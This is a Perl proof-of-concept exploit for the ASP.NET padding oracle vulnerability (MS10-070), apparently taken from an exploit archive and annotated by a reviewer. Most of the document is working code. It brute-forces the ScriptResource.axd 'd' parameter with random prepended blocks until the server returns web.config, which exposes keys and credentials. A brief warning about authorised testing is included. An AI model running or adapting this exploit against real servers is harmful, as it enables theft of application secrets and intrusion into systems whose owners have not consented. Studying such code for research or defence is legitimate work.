
[remote exploits] - ASP.NET Padding Oracle Vulnerability (MS10-070)

Posted on 06 October 2010

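#!/usr/bin/perl
#
# ===============================================
#  ASP.NET Padding Oracle Vulnerability (MS10-070)
# ===============================================
#
# Source: http://blog.mindedsecurity.com/2010/10/breaking-net-encryption-with-or-without.html
#
# Webconfig Bruter - PoC tool for downloading Web.config through
# ScriptResource.axd once a usable encrypted sample has been obtained.
#
# To use this script you need PadBuster: the encrypted sample passed on the
# command line must come from PadBuster, and the encoder / request helpers
# below are taken from it. PadBuster is a great tool and Brian Holyfield
# (Gotham Digital Science) deserves all the credit.
#
# Download PadBuster:
#   http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/
#
# Giorgio Fedon - (giorgio.fedon@mindedsecurity.com)
#
# How it works (as far as this script shows): every attempt prepends a block
# of random bytes to the encrypted sample and sends the result as the "d"
# parameter of ScriptResource.axd.  Presumably (CBC) the prepended block acts
# as the IV for the sample's first block, so that block's plaintext changes on
# every attempt.  The loop stops at the first HTTP 200 whose body does not look
# like an ordinary script resource and prints that body.
#
# NOTE(review): this is attack tooling.  Only run it against systems you are
# authorised to test.  Every attempt is a request the target can log.
#
# Changes vs. the posted listing: restored the regex/string escapes that were
# lost in transcription ("\x00", "\+", "\/", "\r|\n"), fixed the duplicate
# "my $testUrl" and "@ARGV[0]" slices, made the usage text non-interpolating
# (the bare "@mindedsecurity" did not compile under strict), counted the
# successful request in the total, and added an optional request cap so the
# loop cannot run forever against a dead or unaffected host.

use strict;
use warnings;
use LWP::UserAgent;    # also loads HTTP::Request
use Getopt::Std;
use MIME::Base64;
use URI::Escape;
use Getopt::Long;

# Body marker that means ScriptResource.axd served a normal script resource,
# i.e. the candidate block did not hit.  Per the original author's note:
# remove this check for the "T" exploit variant.
use constant SCRIPT_RESOURCE_MARKER => 'parent.Sys.Application';

# One user agent for the whole run so keep_alive actually reuses connections
# (the original created a new agent per request, defeating keep_alive).
my $UA;

exit main(@ARGV) unless caller;

# usage()
#   Returns the command-line help text.  Single-quoted heredoc: nothing in it
#   is interpolated, so the e-mail address is safe under strict.
sub usage {
    return <<'USAGE';

Use: Web.config_bruter.pl ScriptResourceUrl Encrypted_Sample BlockSize [MaxRequests]

Where:
  URL             = The target URL (and query string if applicable)
  EncryptedSample = The encrypted value you want to use. This needs to come from PadBuster.
  BlockSize       = The block size being used by the algorithm (8 or 16)
  MaxRequests     = Optional. Give up after this many requests (default: keep going until a hit)

PoC code by giorgio.fedon@mindedsecurity.com
Original PadBuster code from Brian Holyfield - Gotham Digital Science

Command Example:
  ./Web.config_bruter.pl https://127.0.0.1:8083/ScriptResource.axd d1ARvno0iSA6Ez7Z0GEAmAy3BpX8a2 16

USAGE
}

# main(URL, ENCRYPTED_SAMPLE, BLOCK_SIZE [, MAX_REQUESTS])
#   Drives the brute force.  Returns the process exit code: 0 when a hit was
#   found and printed, 1 when MAX_REQUESTS was reached without one.
#   Dies with the usage text on missing/invalid arguments.
sub main {
    my ($base_url, $sample, $block_size, $max_requests) = @_;

    die usage() if @_ < 3;
    die "BlockSize must be a positive integer (8 or 16 for .NET)\n"
        unless $block_size =~ /\A\d+\z/ && $block_size > 0;
    if (defined $max_requests) {
        die "MaxRequests must be a non-negative integer\n"
            unless $max_requests =~ /\A\d+\z/;
    }
    else {
        $max_requests = 0;    # 0 = unlimited, the original behaviour
    }

    my $method   = 'GET';
    my $test_url = $base_url . '?d=';

    # The sample arrives in .NET URL-token form; work on the raw ciphertext.
    my $sample_bytes = encoder($sample, 1);

    my $requests = 0;
    while (1) {
        if ($max_requests && $requests >= $max_requests) {
            print "No hit after $requests requests, giving up.\n";
            return 1;
        }

        # Fresh random candidate for the leading block on every attempt.
        my $test_bytes = join '', map { chr(int(rand 256)) } 1 .. $block_size;

        # Candidate block + sample, re-encoded the way ASP.NET expects "d".
        my $payload = encoder($test_bytes . $sample_bytes, 0);

        my ($status, $content, $location, $content_length) =
            makeRequest($method, $test_url . $payload);
        $requests++;

        # Detection heuristic: a 200 that is not a script resource.  A target
        # that answers 200 with some other body (custom error page, WAF block
        # page) will be reported as a hit, so eyeball the output.
        next unless $status eq '200';
        next unless index($content, SCRIPT_RESOURCE_MARKER) == -1;

        print $content . "\n";
        print "Total Requests:" . $requests . "\n";
        print "Resulting Exploit Block:" . $payload . "\n";
        return 0;
    }
}

# The following code is taken from PadBuster.
# Credit: Brian Holyfield - Gotham Digital Science
# (I also did an encoder / decoder, but your logic is definitely better.)

# encoder(DATA, OPER)
#   OPER == 1 : decode the ASP.NET URL-token form (base64 with '-' for '+',
#               '_' for '/', and the number of stripped '=' pads appended as
#               the final character) into raw bytes.
#   otherwise : encode raw bytes into that URL-token form.  The result never
#               contains line breaks.
#   Dies when a value to decode does not end with a pad count of 0..2.
sub encoder {
    my ($data, $oper) = @_;

    if ($oper == 1) {
        $data =~ s/-/+/g;
        $data =~ s/_/\//g;
        my $pad_count = chop($data);
        die "Encrypted sample does not end with a pad count (0-2); did it come from PadBuster?\n"
            unless defined $pad_count && $pad_count =~ /\A[0-2]\z/;
        $data .= '=' x int($pad_count);
        return decode_base64($data);
    }

    my $encoded = encode_base64($data, '');    # '' = no line breaks
    $encoded =~ s/\+/-/g;
    $encoded =~ s/\//_/g;
    my $pad_count = ($encoded =~ s/=//g) || 0;  # s///g returns '' when nothing matched
    return $encoded . $pad_count;
}

# makeRequest(METHOD, URL)
#   Sends one request without following redirects and returns
#   (status code as 3-char string, body, Location header or 'N/A', Content-Length).
#   Transport failures surface as LWP's synthetic status (not a 200), so the
#   caller simply keeps trying; watch the request count if the host is down.
#   NOTE(review): recent LWP versions verify TLS certificates by default; for
#   a lab target with a self-signed certificate you may need
#   ssl_opts => { verify_hostname => 0 } on the agent.  Not changed here.
sub makeRequest {
    my ($method, $url) = @_;

    $UA ||= LWP::UserAgent->new(
        env_proxy             => 1,
        keep_alive            => 1,
        timeout               => 30,
        requests_redirectable => [],
    );

    my $response = $UA->request(HTTP::Request->new($method => $url));

    my $status   = substr($response->status_line, 0, 3);
    my $content  = $response->content;
    my $location = $response->header('Location');
    $location = 'N/A' if !defined $location || $location eq '';
    my $content_length = $response->header('Content-Length');

    return ($status, $content, $location, $content_length);
}

# Inj3ct0r.com [2010-10-06]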

 
